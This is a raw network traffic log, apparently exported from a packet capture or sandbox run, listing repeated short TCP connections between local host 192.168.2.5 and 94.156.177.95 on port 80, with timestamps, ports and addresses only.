Nov 15, 2024 18:15:19.770859957 CET	80	49999	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:19.770914078 CET	49999	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:19.775789022 CET	80	49999	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:20.776741982 CET	80	49999	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:20.778564930 CET	49999	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:20.784081936 CET	80	49999	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:20.785867929 CET	49999	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:21.142698050 CET	50006	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:21.147818089 CET	80	50006	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:21.151222944 CET	50006	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:21.177195072 CET	50006	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:21.182182074 CET	80	50006	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:21.183193922 CET	50006	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:21.187993050 CET	80	50006	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:22.095532894 CET	80	50006	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:22.095645905 CET	50006	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:22.101011038 CET	80	50006	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:22.101088047 CET	50006	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:22.261388063 CET	50014	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:22.266422987 CET	80	50014	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:22.266518116 CET	50014	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:22.271795988 CET	50014	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:22.276722908 CET	80	50014	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:22.276771069 CET	50014	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:22.281711102 CET	80	50014	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:23.204288960 CET	80	50014	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:23.204415083 CET	50014	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:23.210169077 CET	80	50014	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:23.210256100 CET	50014	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:23.373785019 CET	50022	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:23.379025936 CET	80	50022	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:23.379137993 CET	50022	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:23.381226063 CET	50022	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:23.386837006 CET	80	50022	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:23.386904955 CET	50022	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:23.391885996 CET	80	50022	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:24.317574978 CET	80	50022	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:24.317698002 CET	50022	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:24.323158979 CET	80	50022	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:24.323250055 CET	50022	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:24.472687006 CET	50023	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:24.477854013 CET	80	50023	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:24.478111029 CET	50023	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:24.481081009 CET	50023	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:24.485985041 CET	80	50023	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:24.486068010 CET	50023	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:24.490936041 CET	80	50023	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:26.041918993 CET	80	50023	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:26.042078018 CET	50023	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:26.047516108 CET	80	50023	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:26.047621965 CET	50023	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:26.186009884 CET	50024	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:26.191159010 CET	80	50024	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:26.191277027 CET	50024	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:26.193200111 CET	50024	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:26.198102951 CET	80	50024	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:26.198172092 CET	50024	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:26.203188896 CET	80	50024	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:27.521374941 CET	80	50024	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:27.521568060 CET	50024	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:27.526873112 CET	80	50024	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:27.526938915 CET	50024	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:27.667527914 CET	50025	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:27.673150063 CET	80	50025	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:27.673257113 CET	50025	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:27.675182104 CET	50025	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:27.680811882 CET	80	50025	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:27.680896997 CET	50025	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:27.687643051 CET	80	50025	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:28.641117096 CET	80	50025	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:28.641530991 CET	50025	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:28.646914959 CET	80	50025	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:28.647000074 CET	50025	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:28.781821012 CET	50026	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:28.786644936 CET	80	50026	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:28.786720037 CET	50026	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:28.788830042 CET	50026	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:28.793634892 CET	80	50026	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:28.793698072 CET	50026	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:28.798505068 CET	80	50026	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:29.754606009 CET	80	50026	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:29.755022049 CET	50026	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:29.760485888 CET	80	50026	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:29.760586977 CET	50026	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:29.911617994 CET	50027	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:29.916563034 CET	80	50027	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:29.916760921 CET	50027	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:29.920413017 CET	50027	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:29.925353050 CET	80	50027	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:29.925407887 CET	50027	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:29.930174112 CET	80	50027	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:30.894785881 CET	80	50027	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:30.895118952 CET	50027	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:30.900415897 CET	80	50027	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:30.900504112 CET	50027	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:31.040975094 CET	50028	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:31.045794964 CET	80	50028	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:31.045890093 CET	50028	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:31.047650099 CET	50028	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:31.052552938 CET	80	50028	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:31.052611113 CET	50028	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:31.057426929 CET	80	50028	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:32.048650980 CET	80	50028	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:32.048759937 CET	50028	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:32.054223061 CET	80	50028	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:32.054280043 CET	50028	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:32.200846910 CET	50029	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:32.206588030 CET	80	50029	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:32.206703901 CET	50029	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:32.208452940 CET	50029	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:32.214029074 CET	80	50029	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:32.214107990 CET	50029	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:32.218996048 CET	80	50029	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:33.168128967 CET	80	50029	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:33.168332100 CET	50029	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:33.173572063 CET	80	50029	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:33.173660040 CET	50029	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:33.319567919 CET	50030	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:33.324867010 CET	80	50030	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:33.324956894 CET	50030	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:33.327476978 CET	50030	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:33.332315922 CET	80	50030	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:33.332376003 CET	50030	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:33.337188005 CET	80	50030	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:34.322305918 CET	80	50030	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:34.322493076 CET	50030	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:34.327920914 CET	80	50030	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:34.328016996 CET	50030	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:34.466764927 CET	50031	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:34.471787930 CET	80	50031	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:34.471878052 CET	50031	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:34.474889040 CET	50031	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:34.479686022 CET	80	50031	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:34.479836941 CET	50031	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:34.484632969 CET	80	50031	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:35.458338022 CET	80	50031	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:35.461033106 CET	50031	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:35.466270924 CET	80	50031	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:35.466346979 CET	50031	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:35.605861902 CET	50032	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:35.610925913 CET	80	50032	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:35.611047983 CET	50032	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:35.613207102 CET	50032	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:35.618112087 CET	80	50032	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:35.618187904 CET	50032	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:35.623164892 CET	80	50032	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:36.584152937 CET	80	50032	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:36.584404945 CET	50032	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:36.589633942 CET	80	50032	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:36.589715004 CET	50032	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:36.732790947 CET	50033	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:36.737766981 CET	80	50033	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:36.737849951 CET	50033	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:36.740186930 CET	50033	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:36.745114088 CET	80	50033	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:36.745165110 CET	50033	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:36.750010967 CET	80	50033	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:37.681458950 CET	80	50033	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:37.681742907 CET	50033	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:37.687212944 CET	80	50033	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:37.687293053 CET	50033	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:37.822791100 CET	50034	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:37.828783035 CET	80	50034	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:37.828880072 CET	50034	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:37.830840111 CET	50034	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:37.835594893 CET	80	50034	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:37.835645914 CET	50034	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:37.841408014 CET	80	50034	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:38.775286913 CET	80	50034	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:38.775422096 CET	50034	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:38.780885935 CET	80	50034	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:38.780970097 CET	50034	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:38.917957067 CET	50035	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:38.922935963 CET	80	50035	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:38.923042059 CET	50035	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:38.925018072 CET	50035	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:38.929953098 CET	80	50035	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:38.930011034 CET	50035	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:38.934786081 CET	80	50035	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:39.883445024 CET	80	50035	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:39.883593082 CET	50035	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:39.888798952 CET	80	50035	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:39.888879061 CET	50035	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:40.028990984 CET	50036	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:40.033910036 CET	80	50036	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:40.034008026 CET	50036	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:40.036921024 CET	50036	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:40.041719913 CET	80	50036	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:40.041826010 CET	50036	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:40.046734095 CET	80	50036	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:40.977866888 CET	80	50036	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:40.978030920 CET	50036	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:40.983503103 CET	80	50036	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:40.983603954 CET	50036	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:41.121112108 CET	50037	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:41.126219034 CET	80	50037	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:41.126327991 CET	50037	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:41.128297091 CET	50037	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:41.133140087 CET	80	50037	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:41.133212090 CET	50037	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:41.138256073 CET	80	50037	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:42.128469944 CET	80	50037	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:42.128774881 CET	50037	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:42.133976936 CET	80	50037	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:42.134040117 CET	50037	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:42.275794983 CET	50038	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:42.280632019 CET	80	50038	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:42.280814886 CET	50038	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:42.282579899 CET	50038	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:42.287417889 CET	80	50038	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:42.287477016 CET	50038	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:42.292251110 CET	80	50038	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:43.271620989 CET	80	50038	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:43.271864891 CET	50038	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:43.281944036 CET	80	50038	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:43.282128096 CET	50038	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:43.419059992 CET	50039	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:43.424024105 CET	80	50039	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:43.424118996 CET	50039	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:43.427052021 CET	50039	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:43.432013988 CET	80	50039	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:43.432085037 CET	50039	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:43.437139034 CET	80	50039	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:44.406034946 CET	80	50039	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:44.406130075 CET	50039	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:44.438767910 CET	80	50039	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:44.438873053 CET	50039	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:44.545964956 CET	50040	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:44.551708937 CET	80	50040	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:44.551805973 CET	50040	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:44.553605080 CET	50040	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:44.558552980 CET	80	50040	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:44.558614016 CET	50040	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:44.563461065 CET	80	50040	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:45.497798920 CET	80	50040	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:45.498059988 CET	50040	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:45.503504038 CET	80	50040	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:45.503570080 CET	50040	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:45.633292913 CET	50041	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:45.638242006 CET	80	50041	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:45.638328075 CET	50041	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:45.640340090 CET	50041	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:45.645261049 CET	80	50041	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:45.645313025 CET	50041	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:45.650158882 CET	80	50041	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:46.620285034 CET	80	50041	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:46.635567904 CET	50041	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:46.641061068 CET	80	50041	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:46.643246889 CET	50041	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:46.923903942 CET	50042	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:46.929112911 CET	80	50042	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:46.929239988 CET	50042	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:46.933274984 CET	50042	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:46.938388109 CET	80	50042	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:46.938497066 CET	50042	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:46.943367958 CET	80	50042	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:47.899243116 CET	80	50042	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:47.899601936 CET	50042	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:47.905044079 CET	80	50042	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:47.905117989 CET	50042	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:48.040792942 CET	50043	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:48.045766115 CET	80	50043	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:48.045981884 CET	50043	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:48.048041105 CET	50043	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:48.052925110 CET	80	50043	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:48.052999973 CET	50043	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:48.057811975 CET	80	50043	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:49.008040905 CET	80	50043	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:49.008238077 CET	50043	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:49.013885975 CET	80	50043	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:49.013968945 CET	50043	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:49.186578035 CET	50044	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:49.191561937 CET	80	50044	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:49.191770077 CET	50044	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:49.193806887 CET	50044	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:49.198694944 CET	80	50044	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:49.198771954 CET	50044	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:49.203593969 CET	80	50044	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:50.169981003 CET	80	50044	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:50.170092106 CET	50044	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:50.176255941 CET	80	50044	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:50.176431894 CET	50044	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:50.318433046 CET	50045	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:51.307200909 CET	80	50045	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:51.307305098 CET	50045	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:51.309339046 CET	50045	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:51.314162970 CET	80	50045	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:51.314217091 CET	50045	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:51.318995953 CET	80	50045	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:52.304002047 CET	80	50045	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:52.304138899 CET	50045	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:52.309323072 CET	80	50045	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:52.309390068 CET	50045	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:52.459635019 CET	50046	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:52.464615107 CET	80	50046	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:52.464754105 CET	50046	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:52.467847109 CET	50046	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:52.472707987 CET	80	50046	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:52.472929001 CET	50046	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:52.477711916 CET	80	50046	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:53.784013033 CET	80	50046	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:53.784153938 CET	50046	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:53.790066004 CET	80	50046	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:53.790132999 CET	50046	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:53.939418077 CET	50047	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:53.944360018 CET	80	50047	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:53.944452047 CET	50047	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:53.946496010 CET	50047	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:53.951329947 CET	80	50047	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:53.951385975 CET	50047	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:53.956245899 CET	80	50047	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:54.916069031 CET	80	50047	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:54.916539907 CET	50047	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:54.922369003 CET	80	50047	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:54.922529936 CET	50047	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:55.065984964 CET	50048	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:55.070954084 CET	80	50048	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:55.071028948 CET	50048	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:55.073044062 CET	50048	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:55.077860117 CET	80	50048	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:55.077914000 CET	50048	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:55.082861900 CET	80	50048	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:56.055499077 CET	80	50048	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:56.055649042 CET	50048	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:56.061021090 CET	80	50048	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:56.061105967 CET	50048	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:56.194719076 CET	50049	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:56.199596882 CET	80	50049	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:56.199687958 CET	50049	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:56.201775074 CET	50049	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:56.206700087 CET	80	50049	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:56.206763029 CET	50049	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:56.211594105 CET	80	50049	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:57.189745903 CET	80	50049	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:57.189915895 CET	50049	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:57.195280075 CET	80	50049	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:57.195503950 CET	50049	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:57.340611935 CET	50050	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:57.345591068 CET	80	50050	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:57.345830917 CET	50050	80	192.168.2.5	94.156.177.95
